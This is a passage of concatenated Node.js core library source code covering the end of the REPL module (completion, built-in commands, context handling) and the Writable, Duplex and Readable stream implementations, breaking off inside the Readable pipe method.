exports.REPLServer = REPLServer;




exports.start = function(prompt, source, eval_, useGlobal, ignoreUndefined) {
  var repl = new REPLServer(prompt, source, eval_, useGlobal, ignoreUndefined);
  if (!exports.repl) exports.repl = repl;
  return repl;
};

REPLServer.prototype.createContext = function() {
  var context;
  if (this.useGlobal) {
    context = global;
  } else {
    context = vm.createContext();
    for (var i in global) context[i] = global[i];
    context.console = new Console(this.outputStream);
    context.global = context;
    context.global.global = context;
  }

  context.module = module;
  context.require = require;

  this.lines = [];
  this.lines.level = [];

  
  
  exports._builtinLibs.forEach(function(name) {
    Object.defineProperty(context, name, {
      get: function() {
        var lib = require(name);
        context._ = context[name] = lib;
        return lib;
      },
      
      set: function(val) {
        delete context[name];
        context[name] = val;
      },
      configurable: true
    });
  });

  return context;
};

REPLServer.prototype.resetContext = function() {
  this.context = this.createContext();

  
  this.emit('reset', this.context);
};

REPLServer.prototype.displayPrompt = function(preserveCursor) {
  var prompt = this._initialPrompt;
  if (this.bufferedCommand.length) {
    prompt = '...';
    var levelInd = new Array(this.lines.level.length).join('..');
    prompt += levelInd + ' ';
  }

  
  REPLServer.super_.prototype.setPrompt.call(this, prompt);
  this.prompt(preserveCursor);
};


REPLServer.prototype.setPrompt = function setPrompt(prompt) {
  this._initialPrompt = prompt;
  REPLServer.super_.prototype.setPrompt.call(this, prompt);
};



function ArrayStream() {
  Stream.call(this);

  this.run = function(data) {
    var self = this;
    data.forEach(function(line) {
      self.emit('data', line + '\n');
    });
  }
}
util.inherits(ArrayStream, Stream);
ArrayStream.prototype.readable = true;
ArrayStream.prototype.writable = true;
ArrayStream.prototype.resume = function() {};
ArrayStream.prototype.write = function() {};

var requireRE = /\brequire\s*\(['"](([\w\.\/-]+\/)?([\w\.\/-]*))/;
var simpleExpressionRE =
    /(([a-zA-Z_$](?:\w|\$)*)\.)*([a-zA-Z_$](?:\w|\$)*)\.?$/;












REPLServer.prototype.complete = function(line, callback) {
  
  if (!util.isUndefined(this.bufferedCommand) && this.bufferedCommand.length) {
    
    var tmp = this.lines.slice();
    
    
    this.lines.level.forEach(function(kill) {
      if (kill.isFunction) {
        tmp[kill.line] = '';
      }
    });
    var flat = new ArrayStream();         
    var magic = new REPLServer('', flat); 
    magic.context = magic.createContext();
    flat.run(tmp);                        
    
    
    if (!magic.bufferedCommand) {
      return magic.complete(line, callback);
    }
  }

  var completions;

  
  var completionGroups = [];

  var completeOn, match, filter, i, group, c;

  
  var match = null;
  match = line.match(/^\s*(\.\w*)$/);
  if (match) {
    completionGroups.push(Object.keys(this.commands));
    completeOn = match[1];
    if (match[1].length > 1) {
      filter = match[1];
    }

    completionGroupsLoaded();
  } else if (match = line.match(requireRE)) {
    
    var exts = Object.keys(require.extensions);
    var indexRe = new RegExp('^index(' + exts.map(regexpEscape).join('|') +
                             ')$');

    completeOn = match[1];
    var subdir = match[2] || '';
    var filter = match[1];
    var dir, files, f, name, base, ext, abs, subfiles, s;
    group = [];
    var paths = module.paths.concat(require('module').globalPaths);
    for (i = 0; i < paths.length; i++) {
      dir = path.resolve(paths[i], subdir);
      try {
        files = fs.readdirSync(dir);
      } catch (e) {
        continue;
      }
      for (f = 0; f < files.length; f++) {
        name = files[f];
        ext = path.extname(name);
        base = name.slice(0, -ext.length);
        if (base.match(/-\d+\.\d+(\.\d+)?/) || name === '.npm') {
          
          continue;
        }
        if (exts.indexOf(ext) !== -1) {
          if (!subdir || base !== 'index') {
            group.push(subdir + base);
          }
        } else {
          abs = path.resolve(dir, name);
          try {
            if (fs.statSync(abs).isDirectory()) {
              group.push(subdir + name + '/');
              subfiles = fs.readdirSync(abs);
              for (s = 0; s < subfiles.length; s++) {
                if (indexRe.test(subfiles[s])) {
                  group.push(subdir + name);
                }
              }
            }
          } catch (e) {}
        }
      }
    }
    if (group.length) {
      completionGroups.push(group);
    }

    if (!subdir) {
      completionGroups.push(exports._builtinLibs);
    }

    completionGroupsLoaded();

  
  
  
  
  
  
  
  
  
  
  } else if (line.length === 0 || line[line.length - 1].match(/\w|\.|\$/)) {
    match = simpleExpressionRE.exec(line);
    if (line.length === 0 || match) {
      var expr;
      completeOn = (match ? match[0] : '');
      if (line.length === 0) {
        filter = '';
        expr = '';
      } else if (line[line.length - 1] === '.') {
        filter = '';
        expr = match[0].slice(0, match[0].length - 1);
      } else {
        var bits = match[0].split('.');
        filter = bits.pop();
        expr = bits.join('.');
      }

      
      var memberGroups = [];
      if (!expr) {
        
        
        if (this.useGlobal ||
            this.context.constructor &&
            this.context.constructor.name === 'Context') {
          var contextProto = this.context;
          while (contextProto = Object.getPrototypeOf(contextProto)) {
            completionGroups.push(Object.getOwnPropertyNames(contextProto));
          }
          completionGroups.push(Object.getOwnPropertyNames(this.context));
          addStandardGlobals(completionGroups, filter);
          completionGroupsLoaded();
        } else {
          this.eval('.scope', this.context, 'repl', function(err, globals) {
            if (err || !globals) {
              addStandardGlobals(completionGroups, filter);
            } else if (util.isArray(globals[0])) {
              
              globals.forEach(function(group) {
                completionGroups.push(group);
              });
            } else {
              completionGroups.push(globals);
              addStandardGlobals(completionGroups, filter);
            }
            completionGroupsLoaded();
          });
        }
      } else {
        this.eval(expr, this.context, 'repl', function(e, obj) {
          

          if (obj != null) {
            if (util.isObject(obj) || util.isFunction(obj)) {
              memberGroups.push(Object.getOwnPropertyNames(obj));
            }
            
            try {
              var sentinel = 5;
              var p;
              if (util.isObject(obj) || util.isFunction(obj)) {
                p = Object.getPrototypeOf(obj);
              } else {
                p = obj.constructor ? obj.constructor.prototype : null;
              }
              while (!util.isNull(p)) {
                memberGroups.push(Object.getOwnPropertyNames(p));
                p = Object.getPrototypeOf(p);
                
                sentinel--;
                if (sentinel <= 0) {
                  break;
                }
              }
            } catch (e) {
              
            }
          }

          if (memberGroups.length) {
            for (i = 0; i < memberGroups.length; i++) {
              completionGroups.push(memberGroups[i].map(function(member) {
                return expr + '.' + member;
              }));
            }
            if (filter) {
              filter = expr + '.' + filter;
            }
          }

          completionGroupsLoaded();
        });
      }
    } else {
      completionGroupsLoaded();
    }
  } else {
    completionGroupsLoaded();
  }

  
  
  function completionGroupsLoaded(err) {
    if (err) throw err;

    
    if (completionGroups.length && filter) {
      var newCompletionGroups = [];
      for (i = 0; i < completionGroups.length; i++) {
        group = completionGroups[i].filter(function(elem) {
          return elem.indexOf(filter) == 0;
        });
        if (group.length) {
          newCompletionGroups.push(group);
        }
      }
      completionGroups = newCompletionGroups;
    }

    if (completionGroups.length) {
      var uniq = {};  
      completions = [];
      
      
      
      for (i = completionGroups.length - 1; i >= 0; i--) {
        group = completionGroups[i];
        group.sort();
        for (var j = 0; j < group.length; j++) {
          c = group[j];
          if (!hasOwnProperty(uniq, c)) {
            completions.push(c);
            uniq[c] = true;
          }
        }
        completions.push(''); 
      }
      while (completions.length && completions[completions.length - 1] === '') {
        completions.pop();
      }
    }

    callback(null, [completions || [], completeOn]);
  }
};



REPLServer.prototype.parseREPLKeyword = function(keyword, rest) {
  var cmd = this.commands[keyword];
  if (cmd) {
    cmd.action.call(this, rest);
    return true;
  }
  return false;
};


REPLServer.prototype.defineCommand = function(keyword, cmd) {
  if (util.isFunction(cmd)) {
    cmd = {action: cmd};
  } else if (!util.isFunction(cmd.action)) {
    throw new Error('bad argument, action must be a function');
  }
  this.commands[keyword] = cmd;
};

REPLServer.prototype.memory = function memory(cmd) {
  var self = this;

  self.lines = self.lines || [];
  self.lines.level = self.lines.level || [];

  
  if (cmd) {
    
    self.lines.push(new Array(self.lines.level.length).join('  ') + cmd);
  } else {
    
    self.lines.push('');
  }

  
  
  
  if (cmd) {
    
    
    var dw = cmd.match(/{|\(/g);
    var up = cmd.match(/}|\)/g);
    up = up ? up.length : 0;
    dw = dw ? dw.length : 0;
    var depth = dw - up;

    if (depth) {
      (function workIt() {
        if (depth > 0) {
          
          
          
          
          
          
          
          self.lines.level.push({
            line: self.lines.length - 1,
            depth: depth,
            isFunction: /\s*function\s*/.test(cmd)
          });
        } else if (depth < 0) {
          
          var curr = self.lines.level.pop();
          if (curr) {
            var tmp = curr.depth + depth;
            if (tmp < 0) {
              
              depth += curr.depth;
              workIt();
            } else if (tmp > 0) {
              
              curr.depth += depth;
              self.lines.level.push(curr);
            }
          }
        }
      }());
    }

    
    
    
    
    
    
    
  } else {
    self.lines.level = [];
  }
};

function addStandardGlobals(completionGroups, filter) {
  
  
  completionGroups.push(['NaN', 'Infinity', 'undefined',
    'eval', 'parseInt', 'parseFloat', 'isNaN', 'isFinite', 'decodeURI',
    'decodeURIComponent', 'encodeURI', 'encodeURIComponent',
    'Object', 'Function', 'Array', 'String', 'Boolean', 'Number',
    'Date', 'RegExp', 'Error', 'EvalError', 'RangeError',
    'ReferenceError', 'SyntaxError', 'TypeError', 'URIError',
    'Math', 'JSON']);
  
  
  if (filter) {
    completionGroups.push(['break', 'case', 'catch', 'const',
      'continue', 'debugger', 'default', 'delete', 'do', 'else',
      'export', 'false', 'finally', 'for', 'function', 'if',
      'import', 'in', 'instanceof', 'let', 'new', 'null', 'return',
      'switch', 'this', 'throw', 'true', 'try', 'typeof', 'undefined',
      'var', 'void', 'while', 'with', 'yield']);
  }
}

function defineDefaultCommands(repl) {
  
  repl.defineCommand('break', {
    help: 'Sometimes you get stuck, this gets you out',
    action: function() {
      this.bufferedCommand = '';
      this.displayPrompt();
    }
  });

  var clearMessage;
  if (repl.useGlobal) {
    clearMessage = 'Alias for .break';
  } else {
    clearMessage = 'Break, and also clear the local context';
  }
  repl.defineCommand('clear', {
    help: clearMessage,
    action: function() {
      this.bufferedCommand = '';
      if (!this.useGlobal) {
        this.outputStream.write('Clearing context...\n');
        this.resetContext();
      }
      this.displayPrompt();
    }
  });

  repl.defineCommand('exit', {
    help: 'Exit the repl',
    action: function() {
      this.close();
    }
  });

  repl.defineCommand('help', {
    help: 'Show repl options',
    action: function() {
      var self = this;
      Object.keys(this.commands).sort().forEach(function(name) {
        var cmd = self.commands[name];
        self.outputStream.write(name + '\t' + (cmd.help || '') + '\n');
      });
      this.displayPrompt();
    }
  });

  repl.defineCommand('save', {
    help: 'Save all evaluated commands in this REPL session to a file',
    action: function(file) {
      try {
        fs.writeFileSync(file, this.lines.join('\n') + '\n');
        this.outputStream.write('Session saved to:' + file + '\n');
      } catch (e) {
        this.outputStream.write('Failed to save:' + file + '\n');
      }
      this.displayPrompt();
    }
  });

  repl.defineCommand('load', {
    help: 'Load JS from a file into the REPL session',
    action: function(file) {
      try {
        var stats = fs.statSync(file);
        if (stats && stats.isFile()) {
          var self = this;
          var data = fs.readFileSync(file, 'utf8');
          var lines = data.split('\n');
          this.displayPrompt();
          lines.forEach(function(line) {
            if (line) {
              self.write(line + '\n');
            }
          });
        }
      } catch (e) {
        this.outputStream.write('Failed to load:' + file + '\n');
      }
      this.displayPrompt();
    }
  });
}


function trimWhitespace(cmd) {
  var trimmer = /^\s*(.+)\s*$/m,
      matches = trimmer.exec(cmd);

  if (matches && matches.length === 2) {
    return matches[1];
  }
  return '';
}


function regexpEscape(s) {
  return s.replace(/[-[\]{}()*+?.,\\^$|#\s]/g, '\\$&');
}



REPLServer.prototype.convertToContext = function(cmd) {
  var self = this, matches,
      scopeVar = /^\s*var\s*([_\w\$]+)(.*)$/m,
      scopeFunc = /^\s*function\s*([_\w\$]+)/;

  
  matches = scopeVar.exec(cmd);
  if (matches && matches.length === 3) {
    return 'self.context.' + matches[1] + matches[2];
  }

  
  matches = scopeFunc.exec(self.bufferedCommand);
  if (matches && matches.length === 2) {
    return matches[1] + ' = ' + self.bufferedCommand;
  }

  return cmd;
};




function isRecoverableError(e) {
  return e &&
      e.name === 'SyntaxError' &&
      /^(Unexpected end of input|Unexpected token :)/.test(e.message);
}

function Recoverable(err) {
  this.err = err;
}
inherits(Recoverable, SyntaxError);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      

========


























module.exports = Writable;
Writable.WritableState = WritableState;

var util = require('util');
var Stream = require('stream');

util.inherits(Writable, Stream);

function WriteReq(chunk, encoding, cb) {
  this.chunk = chunk;
  this.encoding = encoding;
  this.callback = cb;
}

function WritableState(options, stream) {
  options = options || {};

  
  
  this.objectMode = !!options.objectMode;

  if (stream instanceof Stream.Duplex)
    this.objectMode = this.objectMode || !!options.writableObjectMode;

  
  
  
  var hwm = options.highWaterMark;
  var defaultHwm = this.objectMode ? 16 : 16 * 1024;
  this.highWaterMark = (hwm || hwm === 0) ? hwm : defaultHwm;

  
  this.highWaterMark = ~~this.highWaterMark;

  this.needDrain = false;
  
  this.ending = false;
  
  this.ended = false;
  
  this.finished = false;

  
  
  
  var noDecode = options.decodeStrings === false;
  this.decodeStrings = !noDecode;

  
  
  
  this.defaultEncoding = options.defaultEncoding || 'utf8';

  
  
  
  this.length = 0;

  
  this.writing = false;

  
  this.corked = 0;

  
  
  
  
  this.sync = true;

  
  
  
  this.bufferProcessing = false;

  
  this.onwrite = function(er) {
    onwrite(stream, er);
  };

  
  this.writecb = null;

  
  this.writelen = 0;

  this.buffer = [];

  
  
  this.pendingcb = 0;

  
  
  this.prefinished = false;

  
  this.errorEmitted = false;
}

function Writable(options) {
  
  
  if (!(this instanceof Writable) && !(this instanceof Stream.Duplex))
    return new Writable(options);

  this._writableState = new WritableState(options, this);

  
  this.writable = true;

  Stream.call(this);
}


Writable.prototype.pipe = function() {
  this.emit('error', new Error('Cannot pipe. Not readable.'));
};


function writeAfterEnd(stream, state, cb) {
  var er = new Error('write after end');
  
  stream.emit('error', er);
  process.nextTick(function() {
    cb(er);
  });
}






function validChunk(stream, state, chunk, cb) {
  var valid = true;
  if (!util.isBuffer(chunk) &&
      !util.isString(chunk) &&
      !util.isNullOrUndefined(chunk) &&
      !state.objectMode) {
    var er = new TypeError('Invalid non-string/buffer chunk');
    stream.emit('error', er);
    process.nextTick(function() {
      cb(er);
    });
    valid = false;
  }
  return valid;
}

Writable.prototype.write = function(chunk, encoding, cb) {
  var state = this._writableState;
  var ret = false;

  if (util.isFunction(encoding)) {
    cb = encoding;
    encoding = null;
  }

  if (util.isBuffer(chunk))
    encoding = 'buffer';
  else if (!encoding)
    encoding = state.defaultEncoding;

  if (!util.isFunction(cb))
    cb = function() {};

  if (state.ended)
    writeAfterEnd(this, state, cb);
  else if (validChunk(this, state, chunk, cb)) {
    state.pendingcb++;
    ret = writeOrBuffer(this, state, chunk, encoding, cb);
  }

  return ret;
};

Writable.prototype.cork = function() {
  var state = this._writableState;

  state.corked++;
};

Writable.prototype.uncork = function() {
  var state = this._writableState;

  if (state.corked) {
    state.corked--;

    if (!state.writing &&
        !state.corked &&
        !state.finished &&
        !state.bufferProcessing &&
        state.buffer.length)
      clearBuffer(this, state);
  }
};

function decodeChunk(state, chunk, encoding) {
  if (!state.objectMode &&
      state.decodeStrings !== false &&
      util.isString(chunk)) {
    chunk = new Buffer(chunk, encoding);
  }
  return chunk;
}




function writeOrBuffer(stream, state, chunk, encoding, cb) {
  chunk = decodeChunk(state, chunk, encoding);
  if (util.isBuffer(chunk))
    encoding = 'buffer';
  var len = state.objectMode ? 1 : chunk.length;

  state.length += len;

  var ret = state.length < state.highWaterMark;
  
  if (!ret)
    state.needDrain = true;

  if (state.writing || state.corked)
    state.buffer.push(new WriteReq(chunk, encoding, cb));
  else
    doWrite(stream, state, false, len, chunk, encoding, cb);

  return ret;
}

function doWrite(stream, state, writev, len, chunk, encoding, cb) {
  state.writelen = len;
  state.writecb = cb;
  state.writing = true;
  state.sync = true;
  if (writev)
    stream._writev(chunk, state.onwrite);
  else
    stream._write(chunk, encoding, state.onwrite);
  state.sync = false;
}

function onwriteError(stream, state, sync, er, cb) {
  if (sync)
    process.nextTick(function() {
      state.pendingcb--;
      cb(er);
    });
  else {
    state.pendingcb--;
    cb(er);
  }

  stream._writableState.errorEmitted = true;
  stream.emit('error', er);
}

function onwriteStateUpdate(state) {
  state.writing = false;
  state.writecb = null;
  state.length -= state.writelen;
  state.writelen = 0;
}

function onwrite(stream, er) {
  var state = stream._writableState;
  var sync = state.sync;
  var cb = state.writecb;

  onwriteStateUpdate(state);

  if (er)
    onwriteError(stream, state, sync, er, cb);
  else {
    
    var finished = needFinish(stream, state);

    if (!finished &&
        !state.corked &&
        !state.bufferProcessing &&
        state.buffer.length) {
      clearBuffer(stream, state);
    }

    if (sync) {
      process.nextTick(function() {
        afterWrite(stream, state, finished, cb);
      });
    } else {
      afterWrite(stream, state, finished, cb);
    }
  }
}

function afterWrite(stream, state, finished, cb) {
  if (!finished)
    onwriteDrain(stream, state);
  state.pendingcb--;
  cb();
  finishMaybe(stream, state);
}




function onwriteDrain(stream, state) {
  if (state.length === 0 && state.needDrain) {
    state.needDrain = false;
    stream.emit('drain');
  }
}



function clearBuffer(stream, state) {
  state.bufferProcessing = true;

  if (stream._writev && state.buffer.length > 1) {
    
    var cbs = [];
    for (var c = 0; c < state.buffer.length; c++)
      cbs.push(state.buffer[c].callback);

    
    
    state.pendingcb++;
    doWrite(stream, state, true, state.length, state.buffer, '', function(err) {
      for (var i = 0; i < cbs.length; i++) {
        state.pendingcb--;
        cbs[i](err);
      }
    });

    
    state.buffer = [];
  } else {
    
    for (var c = 0; c < state.buffer.length; c++) {
      var entry = state.buffer[c];
      var chunk = entry.chunk;
      var encoding = entry.encoding;
      var cb = entry.callback;
      var len = state.objectMode ? 1 : chunk.length;

      doWrite(stream, state, false, len, chunk, encoding, cb);

      
      
      
      
      if (state.writing) {
        c++;
        break;
      }
    }

    if (c < state.buffer.length)
      state.buffer = state.buffer.slice(c);
    else
      state.buffer.length = 0;
  }

  state.bufferProcessing = false;
}

Writable.prototype._write = function(chunk, encoding, cb) {
  cb(new Error('not implemented'));

};

Writable.prototype._writev = null;

Writable.prototype.end = function(chunk, encoding, cb) {
  var state = this._writableState;

  if (util.isFunction(chunk)) {
    cb = chunk;
    chunk = null;
    encoding = null;
  } else if (util.isFunction(encoding)) {
    cb = encoding;
    encoding = null;
  }

  if (!util.isNullOrUndefined(chunk))
    this.write(chunk, encoding);

  
  if (state.corked) {
    state.corked = 1;
    this.uncork();
  }

  
  if (!state.ending && !state.finished)
    endWritable(this, state, cb);
};


function needFinish(stream, state) {
  return (state.ending &&
          state.length === 0 &&
          state.buffer.length === 0 &&
          !state.finished &&
          !state.writing);
}

function prefinish(stream, state) {
  if (!state.prefinished) {
    state.prefinished = true;
    stream.emit('prefinish');
  }
}

function finishMaybe(stream, state) {
  var need = needFinish(stream, state);
  if (need) {
    if (state.pendingcb === 0) {
      prefinish(stream, state);
      state.finished = true;
      stream.emit('finish');
    } else
      prefinish(stream, state);
  }
  return need;
}

function endWritable(stream, state, cb) {
  state.ending = true;
  finishMaybe(stream, state);
  if (cb) {
    if (state.finished)
      process.nextTick(cb);
    else
      stream.once('finish', cb);
  }
  state.ended = true;
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              

========



























module.exports = Duplex;
var util = require('util');
var Readable = require('_stream_readable');
var Writable = require('_stream_writable');

util.inherits(Duplex, Readable);

var keys = Object.keys(Writable.prototype);
for (var v = 0; v < keys.length; v++) {
  var method = keys[v];
  if (!Duplex.prototype[method])
    Duplex.prototype[method] = Writable.prototype[method];
}

function Duplex(options) {
  if (!(this instanceof Duplex))
    return new Duplex(options);

  Readable.call(this, options);
  Writable.call(this, options);

  if (options && options.readable === false)
    this.readable = false;

  if (options && options.writable === false)
    this.writable = false;

  this.allowHalfOpen = true;
  if (options && options.allowHalfOpen === false)
    this.allowHalfOpen = false;

  this.once('end', onend);
}


function onend() {
  
  
  if (this.allowHalfOpen || this._writableState.ended)
    return;

  
  
  process.nextTick(this.end.bind(this));
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             

========






















module.exports = Readable;
Readable.ReadableState = ReadableState;

var EE = require('events').EventEmitter;
var Stream = require('stream');
var util = require('util');
var StringDecoder;


util.inherits(Readable, Stream);

function ReadableState(options, stream) {
  options = options || {};

  
  
  this.objectMode = !!options.objectMode;

  if (stream instanceof Stream.Duplex)
    this.objectMode = this.objectMode || !!options.readableObjectMode;

  
  
  var hwm = options.highWaterMark;
  var defaultHwm = this.objectMode ? 16 : 16 * 1024;
  this.highWaterMark = (hwm || hwm === 0) ? hwm : defaultHwm;

  
  this.highWaterMark = ~~this.highWaterMark;

  this.buffer = [];
  this.length = 0;
  this.pipes = null;
  this.pipesCount = 0;
  this.flowing = null;
  this.ended = false;
  this.endEmitted = false;
  this.reading = false;

  
  
  
  
  this.sync = true;

  
  
  this.needReadable = false;
  this.emittedReadable = false;
  this.readableListening = false;

  
  
  
  this.defaultEncoding = options.defaultEncoding || 'utf8';

  
  
  this.ranOut = false;

  
  this.awaitDrain = 0;

  
  this.readingMore = false;

  this.decoder = null;
  this.encoding = null;
  if (options.encoding) {
    if (!StringDecoder)
      StringDecoder = require('string_decoder').StringDecoder;
    this.decoder = new StringDecoder(options.encoding);
    this.encoding = options.encoding;
  }
}

function Readable(options) {
  if (!(this instanceof Readable))
    return new Readable(options);

  this._readableState = new ReadableState(options, this);

  
  this.readable = true;

  Stream.call(this);
}





Readable.prototype.push = function(chunk, encoding) {
  var state = this._readableState;

  if (util.isString(chunk) && !state.objectMode) {
    encoding = encoding || state.defaultEncoding;
    if (encoding !== state.encoding) {
      chunk = new Buffer(chunk, encoding);
      encoding = '';
    }
  }

  return readableAddChunk(this, state, chunk, encoding, false);
};


Readable.prototype.unshift = function(chunk) {
  var state = this._readableState;
  return readableAddChunk(this, state, chunk, '', true);
};

Readable.prototype.isPaused = function() {
  return this._readableState.flowing === false;
};

function readableAddChunk(stream, state, chunk, encoding, addToFront) {
  var er = chunkInvalid(state, chunk);
  if (er) {
    stream.emit('error', er);
  } else if (chunk === null) {
    state.reading = false;
    if (!state.ended)
      onEofChunk(stream, state);
  } else if (state.objectMode || chunk && chunk.length > 0) {
    if (state.ended && !addToFront) {
      var e = new Error('stream.push() after EOF');
      stream.emit('error', e);
    } else if (state.endEmitted && addToFront) {
      var e = new Error('stream.unshift() after end event');
      stream.emit('error', e);
    } else {
      if (state.decoder && !addToFront && !encoding)
        chunk = state.decoder.write(chunk);

      if (!addToFront)
        state.reading = false;

      
      if (state.flowing && state.length === 0 && !state.sync) {
        stream.emit('data', chunk);
        stream.read(0);
      } else {
        
        state.length += state.objectMode ? 1 : chunk.length;
        if (addToFront)
          state.buffer.unshift(chunk);
        else
          state.buffer.push(chunk);

        if (state.needReadable)
          emitReadable(stream);
      }

      maybeReadMore(stream, state);
    }
  } else if (!addToFront) {
    state.reading = false;
  }

  return needMoreData(state);
}










function needMoreData(state) {
  return !state.ended &&
         (state.needReadable ||
          state.length < state.highWaterMark ||
          state.length === 0);
}


Readable.prototype.setEncoding = function(enc) {
  if (!StringDecoder)
    StringDecoder = require('string_decoder').StringDecoder;
  this._readableState.decoder = new StringDecoder(enc);
  this._readableState.encoding = enc;
  return this;
};


var MAX_HWM = 0x800000;
function roundUpToNextPowerOf2(n) {
  if (n >= MAX_HWM) {
    n = MAX_HWM;
  } else {
    
    n--;
    for (var p = 1; p < 32; p <<= 1) n |= n >> p;
    n++;
  }
  return n;
}

function howMuchToRead(n, state) {
  if (state.length === 0 && state.ended)
    return 0;

  if (state.objectMode)
    return n === 0 ? 0 : 1;

  if (util.isNull(n) || isNaN(n)) {
    
    if (state.flowing && state.buffer.length)
      return state.buffer[0].length;
    else
      return state.length;
  }

  if (n <= 0)
    return 0;

  
  
  
  
  if (n > state.highWaterMark)
    state.highWaterMark = roundUpToNextPowerOf2(n);

  
  if (n > state.length) {
    if (!state.ended) {
      state.needReadable = true;
      return 0;
    } else
      return state.length;
  }

  return n;
}


Readable.prototype.read = function(n) {

  var state = this._readableState;
  var nOrig = n;

  if (!util.isNumber(n) || n > 0)
    state.emittedReadable = false;

  
  
  
  if (n === 0 &&
      state.needReadable &&
      (state.length >= state.highWaterMark || state.ended)) {
    if (state.length === 0 && state.ended)
      endReadable(this);
    else
      emitReadable(this);
    return null;
  }

  n = howMuchToRead(n, state);

  
  if (n === 0 && state.ended) {
    if (state.length === 0)
      endReadable(this);
    return null;
  }

  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  

  
  var doRead = state.needReadable;


  
  if (state.length === 0 || state.length - n < state.highWaterMark) {
    doRead = true;
  }

  
  
  if (state.ended || state.reading) {
    doRead = false;
  }

  if (doRead) {
    state.reading = true;
    state.sync = true;
    
    if (state.length === 0)
      state.needReadable = true;
    
    this._read(state.highWaterMark);
    state.sync = false;
  }

  
  
  if (doRead && !state.reading)
    n = howMuchToRead(nOrig, state);

  var ret;
  if (n > 0)
    ret = fromList(n, state);
  else
    ret = null;

  if (util.isNull(ret)) {
    state.needReadable = true;
    n = 0;
  }

  state.length -= n;

  
  
  if (state.length === 0 && !state.ended)
    state.needReadable = true;

  
  if (nOrig !== n && state.ended && state.length === 0)
    endReadable(this);

  if (!util.isNull(ret))
    this.emit('data', ret);

  return ret;
};

function chunkInvalid(state, chunk) {
  var er = null;
  if (!util.isBuffer(chunk) &&
      !util.isString(chunk) &&
      !util.isNullOrUndefined(chunk) &&
      !state.objectMode) {
    er = new TypeError('Invalid non-string/buffer chunk');
  }
  return er;
}


function onEofChunk(stream, state) {
  if (state.decoder && !state.ended) {
    var chunk = state.decoder.end();
    if (chunk && chunk.length) {
      state.buffer.push(chunk);
      state.length += state.objectMode ? 1 : chunk.length;
    }
  }
  state.ended = true;

  
  emitReadable(stream);
}




function emitReadable(stream) {
  var state = stream._readableState;
  state.needReadable = false;
  if (!state.emittedReadable) {
    state.emittedReadable = true;
    if (state.sync)
      process.nextTick(function() {
        emitReadable_(stream);
      });
    else
      emitReadable_(stream);
  }
}

function emitReadable_(stream) {
  stream.emit('readable');
  flow(stream);
}








function maybeReadMore(stream, state) {
  if (!state.readingMore) {
    state.readingMore = true;
    process.nextTick(function() {
      maybeReadMore_(stream, state);
    });
  }
}

function maybeReadMore_(stream, state) {
  var len = state.length;
  while (!state.reading && !state.flowing && !state.ended &&
         state.length < state.highWaterMark) {
    stream.read(0);
    if (len === state.length)
      
      break;
    else
      len = state.length;
  }
  state.readingMore = false;
}





Readable.prototype._read = function(n) {
  this.emit('error', new Error('not implemented'));
};

Readable.prototype.pipe = function(dest, pipeOpts) {
  var src = this;
  var state = this._readableState;

  switch (state.pipesCount) {
    case 0:
      state.pipes = dest;
      break;
    case 1:
      state.pipes = [state.pipes, dest];
      break;
    default:
      state.pipes.push(dest);
      break;
  }
  state.pipesCount += 1;

  var doEnd = (!pipeOpts || pipeOpts.end !== false) &&
              dest !== process.stdout &&
              dest !== process.stderr;

  var endFn = doEnd ? onend : cleanup;
  if (state.endEmitted)
    process.nextTick(endFn);
  else
    src.once('end', endFn);

  dest.on('unpipe', onunpipe);
  function onunpipe(readable) {
    if (readable === src) {
      cleanup();
    }
  }

  function onend() {
    dest.end();
  }

  
  
  
  
  var ondrain = pipeOnDrain(src);
  dest.on('drain', ondrain);

  function cleanup() {
    
    dest.removeListener('close', onclose);
    dest.removeListener('finish', onfinish);
    dest.removeListener('drain', ondrain);
    dest.removeListener('error', onerror);
    dest.removeListener('unpipe', onunpipe);
    src.removeListener('end', onend);
    src.removeListener('end', cleanup);
    src.removeListener('data', ondata);

    
    
    
    
    
    if (state.awaitDrain &&
        (!dest._writableState || dest._writableState.needDrain))
      ondrain();
  }

  src.on('data', ondata);
  function ondata(chunk) {
    var ret = dest.write(chunk);
    if (false === ret) {
      src._readableState.awaitDrain++;
      src.pause();
    }
  }

  
  
  function onerror(er) {
    unpipe();
    dest.removeListener('error', onerror);
    if (EE.listenerCount(dest, 'error') === 0)
      dest.emit('error', er);
  }
  
  
  if (!dest._events || !dest._events.error)
    dest.on('error', onerror);
  else if (Array.isArray(dest._events.error))
    dest._events.error.unshift(onerror);
  else
    dest._events.error = [onerror, dest._events.error];



  
  function onclose() {
    dest.removeListener('finish', onfinish);
    unpipe();
  }
  dest.once('close', onclose);
  function onfinish() {
    dest.removeListener('close', onclose);
    unpipe();
  }
  dest.once('finish', onfinish);

  function unpipe() {
    src.unpipe(dest);
  }

  
  dest.emit('pipe', src);

  
  if (!state.flowing) {
